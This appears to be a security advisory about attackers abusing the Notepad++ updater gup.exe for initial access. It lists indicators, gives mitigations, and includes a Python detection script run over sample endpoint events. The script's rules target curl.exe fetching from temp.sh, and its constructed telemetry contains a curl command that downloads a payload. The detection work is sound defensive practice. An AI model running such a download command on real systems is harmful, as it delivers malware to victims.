
Notepad++ Updater Abused for Initial Access in Limited Reports
Recent reports from small groups of Notepad++ users indicate that the editor's updater component, gup.exe, is being abused for initial access. The activity has been observed primarily in organizations linked to East Asia, with hands-on reconnaissance by the operators reported over the past two months.

gup.exe is the component that checks for Notepad++ updates, downloads the installer and runs it. That makes it a convenient vehicle for an attacker: it is an expected process that is supposed to make outbound connections and to write and launch executables, so a payload delivered through it inherits the trust that security tooling and administrators extend to the updater. The reported abuse therefore fits the supply-chain pattern, in which a legitimate software component, rather than a flaw in the victim's own code, delivers the malware.

The indicators of compromise reported so far are: network requests from gup.exe to destinations the updater has no reason to contact; unusual child processes spawned by gup.exe; a file named update.exe in the user's TEMP folder; and curl.exe connecting to temp.sh. curl.exe ships with current Windows builds, so its presence alone is not suspicious; the destination is.

In response, the Notepad++ developers changed the updater, starting with version 8.8.8, to force downloads via GitHub, with the aim of limiting interception of the update traffic. The continued reports of gup.exe abuse suggest that attackers are finding ways around that change, so upgrading should be treated as one layer of defence rather than a complete fix.

While the reports are currently limited to small groups, the abuse of a tool as widely installed as Notepad++ shows the potential for broader exploitation. The incident is a reminder that update mechanisms are security-critical components and need the same scrutiny as the application they update, and that systems should be monitored for the indicators above.

For security teams, the practical steps are to monitor process-creation and network telemetry for gup.exe, curl.exe and anything launched from TEMP; to apply application allow-listing so that unexpected executables in TEMP cannot run; to keep Notepad++ at 8.8.8 or later; and to verify the integrity of the update process, for example by confirming that gup.exe's update traffic goes only where the current version says it should and that any installer it runs is the one published by the project.
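The indicators above can be turned into a small detection pass over endpoint telemetry. The following is an added example written for this page, not code from the report or from the Notepad++ project. It assumes simplified Sysmon-style events (EventID 1 for process creation, EventID 3 for network connections) with field names chosen here, an assumed allow-list of GitHub hosts for the post-8.8.8 updater, and an assumed file-name pattern for the legitimate installer that gup.exe launches; the sample events are constructed.

```python
"""Detection pass for the gup.exe abuse indicators described on this page.

Added example, not from the original report or the Notepad++ project.
Event shapes loosely follow Sysmon (EventID 1 = process creation,
EventID 3 = network connection) but are simplified; field names,
allow-lists and sample data are assumptions constructed for this example.
"""
import re
from dataclasses import dataclass

# Assumption: from Notepad++ 8.8.8 onwards the updater should only reach GitHub.
EXPECTED_GUP_HOSTS = ("github.com", "objects.githubusercontent.com")

# Assumption: the only child gup.exe legitimately spawns is the downloaded
# Notepad++ installer, whose name looks like npp.<version>.Installer[.x64].exe.
EXPECTED_GUP_CHILDREN = re.compile(r"npp\.[\d.]+\.installer.*\.exe$", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def _basename(path):
    """Lower-cased file name of a Windows path (forward slashes tolerated)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_temp_update_exe(path):
    """update.exe written to a TEMP/TMP folder, an indicator from the report."""
    p = path.replace("/", "\\").lower()
    return _basename(p) == "update.exe" and ("\\temp\\" in p or "\\tmp\\" in p)


def curl_to_temp_sh(image, cmdline):
    """curl.exe invoked with temp.sh anywhere on its command line."""
    return _basename(image) == "curl.exe" and "temp.sh" in cmdline.lower()


def gup_unexpected_destination(image, dest_host):
    """gup.exe connecting to a host that is not GitHub or a GitHub subdomain."""
    if _basename(image) != "gup.exe":
        return False
    host = dest_host.lower()
    return not any(host == h or host.endswith("." + h) for h in EXPECTED_GUP_HOSTS)


def gup_unexpected_child(parent_image, image):
    """gup.exe launching anything other than the expected installer name."""
    return (_basename(parent_image) == "gup.exe"
            and not EXPECTED_GUP_CHILDREN.search(_basename(image)))


def detect(events):
    """Run all four rules over a list of event dicts and return the findings."""
    findings = []
    for e in events:
        if e["EventID"] == 1:
            img = e["Image"]
            parent = e.get("ParentImage", "")
            cmd = e.get("CommandLine", "")
            if is_temp_update_exe(img):
                findings.append(Finding("update.exe in TEMP", 1, img))
            if curl_to_temp_sh(img, cmd):
                findings.append(Finding("curl.exe contacting temp.sh", 1, cmd))
            if gup_unexpected_child(parent, img):
                findings.append(Finding("unexpected child of gup.exe", 1,
                                        f"{parent} -> {img}"))
        elif e["EventID"] == 3:
            host = e.get("DestinationHostname", "")
            if gup_unexpected_destination(e["Image"], host):
                findings.append(Finding("gup.exe to non-GitHub host", 3, host))
    return findings


# Constructed sample telemetry: one benign update check and installer launch,
# followed by the chain of indicators the report describes.
GUP = r"C:\Program Files\Notepad++\updater\gup.exe"
TEMP = r"C:\Users\alice\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"EventID": 3, "Image": GUP, "DestinationHostname": "github.com"},
    {"EventID": 3, "Image": GUP, "DestinationHostname": "update.example.invalid"},
    {"EventID": 1, "ParentImage": GUP,
     "Image": TEMP + r"\npp.8.8.8.Installer.x64.exe", "CommandLine": ""},
    {"EventID": 1, "ParentImage": GUP,
     "Image": TEMP + r"\update.exe", "CommandLine": TEMP + r"\update.exe"},
    {"EventID": 1, "ParentImage": TEMP + r"\update.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -s -o payload.bin https://temp.sh/constructed"},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[EventID {f.event_id}] {f.rule}: {f.detail}")
```

The benign update check to github.com and the launch of the expected installer produce no findings; the other three events trip four rules, with the TEMP update.exe hitting both the path rule and the unexpected-child rule. The host check deliberately requires an exact match or a real subdomain so that a look-alike such as github.com.evil.invalid is still flagged.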